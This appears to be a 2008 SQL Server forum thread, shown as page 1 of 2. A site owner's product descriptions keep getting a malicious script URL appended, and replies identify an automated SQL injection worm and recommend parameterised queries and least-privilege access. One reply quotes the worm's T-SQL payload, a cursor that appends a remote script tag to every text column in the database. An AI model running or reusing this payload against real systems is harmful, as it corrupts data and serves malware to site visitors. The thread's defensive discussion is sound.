SQL Server Forums
Profile | Register | Active Topics | Members | Search | Forum FAQ
 
Register Now and get your question answered!
Username:
Password:
Save Password
Forgot your Password?

 All Forums
 SQL Server 2005 Forums
 SQL Server Administration (2005)
 SQL Keeps gatting hacked
 New Topic  Reply to Topic
 Printer Friendly
Next Page
Author Previous Topic Topic Next Topic
Page: of 2

Rob K
Starting Member

United Kingdom
9 Posts

Posted - 05/13/2008 :  07:52:02  Show Profile  Visit Rob K's Homepage  Reply with Quote
I have a ASP website that uses SQL 2005.
For the last 2 nights someone has hacked the DB and added a url with a script to the end of my product descriptions, the script is located on another server which is infected with viruses.
For example, a field should read 'Clothing', when it gets hacked it reads 'Clothing <Script... blah blah here>'
I have restored the DB each time but I cannot find how they are doing this, the windows Firewall is blocking any ext SQL connections so I am guessing there is something local that is doing this.
Any ideas where to look for clues?

Thanks.

harsh_athalye
Flowing Fount of Yak Knowledge

India
5509 Posts

Posted - 05/13/2008 :  07:53:29  Show Profile  Visit harsh_athalye's Homepage  Click to see harsh_athalye's MSN Messenger address  Send harsh_athalye a Yahoo! Message  Reply with Quote
SQL Injection will be my first guess.

Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED"
Go to Top of Page

Rob K
Starting Member

United Kingdom
9 Posts

Posted - 05/13/2008 :  08:05:49  Show Profile  Visit Rob K's Homepage  Reply with Quote
quote:
Originally posted by harsh_athalye

SQL Injection will be my first guess.

Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED"



Ok, not being a SQL expert, can you help me out here, where would I look to find if that is it?
Go to Top of Page

harsh_athalye
Flowing Fount of Yak Knowledge

India
5509 Posts

Posted - 05/13/2008 :  08:15:01  Show Profile  Visit harsh_athalye's Homepage  Click to see harsh_athalye's MSN Messenger address  Send harsh_athalye a Yahoo! Message  Reply with Quote
See this on basics of SQL Injection and how to prevent it: http://www.ngssoftware.com/papers/advanced_sql_injection.pdf

Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED"
Go to Top of Page

Rob K
Starting Member

United Kingdom
9 Posts

Posted - 05/13/2008 :  08:17:04  Show Profile  Visit Rob K's Homepage  Reply with Quote
Ok, thanks v much for that.
Go to Top of Page

Rob K
Starting Member

United Kingdom
9 Posts

Posted - 05/13/2008 :  09:57:30  Show Profile  Visit Rob K's Homepage  Reply with Quote
If it is a SQL injection, would that be in a log somewhere?
Go to Top of Page

pootle_flump
Flowing Fount of Yak Knowledge

United Kingdom
1064 Posts

Posted - 05/13/2008 :  11:51:33  Show Profile  Reply with Quote
Not in any form that you can read as it is. The problem with SQL Injection is that by definition it is not recognised by SQL Server as malicious. If you are concatenating user input into SQL statements for execution then you can be pretty confident this has been done by SQL Injection.
Go to Top of Page

nheidorn
Starting Member

USA
28 Posts

Posted - 05/13/2008 :  12:29:46  Show Profile  Reply with Quote
Sounds like you might have been hit by the Automated SQL Injection Worm that is going around. You can read more here: http://isc.sans.org/diary.html?storyid=4393.
Go to Top of Page

Rob K
Starting Member

United Kingdom
9 Posts

Posted - 05/13/2008 :  12:38:40  Show Profile  Visit Rob K's Homepage  Reply with Quote
Great, I have blocked the IP's mentioned on that link.
Go to Top of Page

GilaMonster
Flowing Fount of Yak Knowledge

South Africa
4507 Posts

Posted - 05/14/2008 :  02:36:08  Show Profile  Visit GilaMonster's Homepage  Reply with Quote
If you want to protect yourself against SQL injection, use only stored procedures to access the DB. Use parameterised calls in your ASP code. Don't concatenate SQL statements and execute them.
Restrict your database user to have only execute permissions on the stored procs and nothing else.

--
Gail Shaw
Go to Top of Page

SwePeso
Patron Saint of Lost Yaks

Sweden
29910 Posts

Posted - 05/14/2008 :  02:56:00  Show Profile  Visit SwePeso's Homepage  Reply with Quote
Where is the post Jeff made where he dissection the binary string into t-sql?



E 12°55'05.25"
N 56°04'39.16"
Go to Top of Page

GilaMonster
Flowing Fount of Yak Knowledge

South Africa
4507 Posts

Posted - 05/14/2008 :  03:58:44  Show Profile  Visit GilaMonster's Homepage  Reply with Quote
quote:
Originally posted by Peso

Where is the post Jeff made where he dissection the binary string into t-sql?



If you find it, I'd very much like to see it.

--
Gail Shaw
Go to Top of Page

SwePeso
Patron Saint of Lost Yaks

Sweden
29910 Posts

Posted - 05/14/2008 :  04:16:05  Show Profile  Visit SwePeso's Homepage  Reply with Quote
I remember it was something about

SELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE Type IN ('VARCHAR', 'CHAR', 'TEXT')



E 12°55'05.25"
N 56°04'39.16"
Go to Top of Page

SwePeso
Patron Saint of Lost Yaks

Sweden
29910 Posts

Posted - 05/14/2008 :  04:23:40  Show Profile  Visit SwePeso's Homepage  Reply with Quote
The cleartext code looked similar to this
DECLARE @T varchar(255),@C varchar(255) 
DECLARE Table_Cursor CURSOR FOR 
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) BEGIN 
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****p.js></script>''') 
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor



E 12°55'05.25"
N 56°04'39.16"
Go to Top of Page

SwePeso
Patron Saint of Lost Yaks

Sweden
29910 Posts

Posted - 05/14/2008 :  04:27:14  Show Profile  Visit SwePeso's Homepage  Reply with Quote
Found the link
http://www.sqlteam.com/forums/topic.asp?TOPIC_ID=101673



E 12°55'05.25"
N 56°04'39.16"
Go to Top of Page

GilaMonster
Flowing Fount of Yak Knowledge

South Africa
4507 Posts

Posted - 05/14/2008 :  05:00:52  Show Profile  Visit GilaMonster's Homepage  Reply with Quote
Hmm. SQL Injection and XSS all in one. Interesting.

Not close to as damaging as it could have been.

--
Gail Shaw
Go to Top of Page

SwePeso
Patron Saint of Lost Yaks

Sweden
29910 Posts

Posted - 05/14/2008 :  05:07:13  Show Profile  Visit SwePeso's Homepage  Reply with Quote
I agree.
The attack could have encrypted all columns!

I hope this learns all newbies, noobs and beginners to NEVER EVER concatenate string to send to database.
Always use parametrized queries as a first line of defence.




E 12°55'05.25"
N 56°04'39.16"
Go to Top of Page

Byapti
Starting Member

1 Posts

Posted - 05/14/2008 :  05:53:48  Show Profile  Reply with Quote
Hi,

I think the “Testing For SQL Injections” article on http://www.stickyminds.com/sitewide.asp?Function=edetail&ObjectType=ART&ObjectId=11923&tth=DYN&tt=siteemail&iDyn=2 may be helpful in this discussion.

This popular white paper is written by a software engineer from our organization Mindfire Solutions (http://www.mindfiresolutions.com).

I hope you find it useful!

Cheers,
Byapti


Go to Top of Page

SwePeso
Patron Saint of Lost Yaks

Sweden
29910 Posts

Posted - 05/14/2008 :  06:03:24  Show Profile  Visit SwePeso's Homepage  Reply with Quote
Is it really "a vulnerability at database layer"?
The database is just performing what front-end application tells it to.



E 12°55'05.25"
N 56°04'39.16"
Go to Top of Page

GilaMonster
Flowing Fount of Yak Knowledge

South Africa
4507 Posts

Posted - 05/14/2008 :  07:47:36  Show Profile  Visit GilaMonster's Homepage  Reply with Quote
quote:
Originally posted by Peso


I hope this learns all newbies, noobs and beginners to NEVER EVER concatenate string to send to database.
Always use parametrized queries as a first line of defence.



Considering all the posts here and on Central in the last couple weeks, I somehow doubt it.

--
Gail Shaw

Edited by - GilaMonster on 05/14/2008 08:04:28
Go to Top of Page

harsh_athalye
Flowing Fount of Yak Knowledge

India
5509 Posts

Posted - 05/14/2008 :  07:59:37  Show Profile  Visit harsh_athalye's Homepage  Click to see harsh_athalye's MSN Messenger address  Send harsh_athalye a Yahoo! Message  Reply with Quote
Only experience can teach them then!

Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED"
Go to Top of Page
Page: of 2 Previous Topic Topic Next Topic  
Next Page
 New Topic  Reply to Topic
 Printer Friendly
Jump To:
SQL Server Forums © 2000-2009 SQLTeam Publishing, LLC Go To Top Of Page
This page was generated in 0.14 seconds. Powered By: Snitz Forums 2000